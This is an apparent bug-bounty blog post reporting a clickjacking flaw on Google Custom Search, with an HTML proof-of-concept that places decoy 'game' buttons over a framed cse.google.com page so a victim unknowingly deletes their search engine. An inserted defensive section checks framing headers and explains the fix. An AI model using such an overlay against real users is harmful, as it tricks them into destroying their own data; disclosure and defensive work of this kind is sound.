I Found Clickjacking on Google CSE. Is This Important?
While I was testing, I found that cse.google.com is vulnerable to clickjacking, so I checked whether the settings page was vulnerable too, and it was, so now this has a risk! The attacker could delete someone's CSE.
Summary: Attacker can delete victim’s CSE.
Steps to reproduce:
- Go to https://cse.google.com/
- It can be embedded into any webpage.
- The attacker may manipulate the HTML template so that it deletes the victim's CSE.
I wrote exploit code for this clickjacking, and here it is:
<!-- Decoy "game" text and numbered buttons, absolutely positioned so they sit on top of the target page's controls. -->
<center>
<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<!-- The framed target covers the whole viewport; opacity is left at 1 here so the overlay is visible in the PoC video. -->
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>
</center>
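The precondition for a page like the one above is that the target can be loaded inside a third-party iframe at all, which is decided by the response headers X-Frame-Options and Content-Security-Policy frame-ancestors. The following Python is an added example, not code from the original post and not anything Google ships: it reads a set of response headers and says whether third-party framing is blocked. The header values in SAMPLE_RESPONSES are constructed for illustration and do not describe what cse.google.com actually returned.

```python
"""Added example: decide from response headers whether a page can be framed by
a third-party site, the precondition for a clickjacking overlay.

Illustrative code only; the header values below are constructed samples."""
from typing import Mapping


def parse_csp(csp: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    directives: dict[str, list[str]] = {}
    for part in csp.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def framing_verdict(headers: Mapping[str, str]) -> str:
    """Return 'protected', 'restricted' or 'frameable'.

    - A CSP frame-ancestors directive, when present, is authoritative and
      overrides X-Frame-Options in current browsers.
    - X-Frame-Options DENY / SAMEORIGIN block third-party framing; the
      obsolete ALLOW-FROM value is ignored by modern browsers and so gives
      no protection.
    - No header at all means any origin may embed the page in an <iframe>.
    """
    lowered = {k.lower(): v for k, v in headers.items()}

    csp = lowered.get("content-security-policy")
    if csp:
        sources = parse_csp(csp).get("frame-ancestors")
        if sources is not None:
            sources = [s.lower() for s in sources]
            # An empty source list is equivalent to 'none' in the CSP spec.
            if not sources or sources == ["'none'"] or sources == ["'self'"]:
                return "protected"
            if "*" in sources or any(s in ("http:", "https:") for s in sources):
                return "frameable"
            return "restricted"  # explicit allow-list of embedding origins

    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected"
    return "frameable"


# Constructed sample responses: the weak configuration a clickjacking page
# depends on, next to two hardened configurations a site owner would deploy.
SAMPLE_RESPONSES = {
    "no framing protection": {"Content-Type": "text/html"},
    "xfo only": {"X-Frame-Options": "SAMEORIGIN"},
    "csp frame-ancestors": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
        "X-Frame-Options": "DENY",  # kept for old browsers without CSP level 2
    },
}


def report(responses: Mapping[str, Mapping[str, str]]) -> dict[str, str]:
    """Map each named response to its framing verdict."""
    return {name: framing_verdict(h) for name, h in responses.items()}


if __name__ == "__main__":
    for name, verdict in report(SAMPLE_RESPONSES).items():
        print(f"{name:24s} -> {verdict}")
```

The fix for a frameable settings page is the third configuration: frame-ancestors 'none' (or 'self' if the site frames itself) as the primary control, with X-Frame-Options kept alongside it for browsers that predate CSP level 2. Client-side frame-busting JavaScript is not a substitute, since the embedding page can neutralise it with the iframe sandbox attribute.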
By using the clickjacking technique, an attacker can make someone unknowingly delete their CSE.
For how an attacker can make someone unknowingly delete their CSE, you can check my video PoC here:
Enough about the explanation.
Okay, the problem has just begun. My findings above are, in my opinion, valid bugs. Why? Because the attacker can delete someone's data (CSE); isn't this a bug? But the response I got was very surprising.
The part that confuses me is: how is this not a bug? Because in my head it is clear that I can delete other people's data.
What do you think? Is this a bug? Or is it just me who overestimates this as a bug?
This article was already published on dev.to.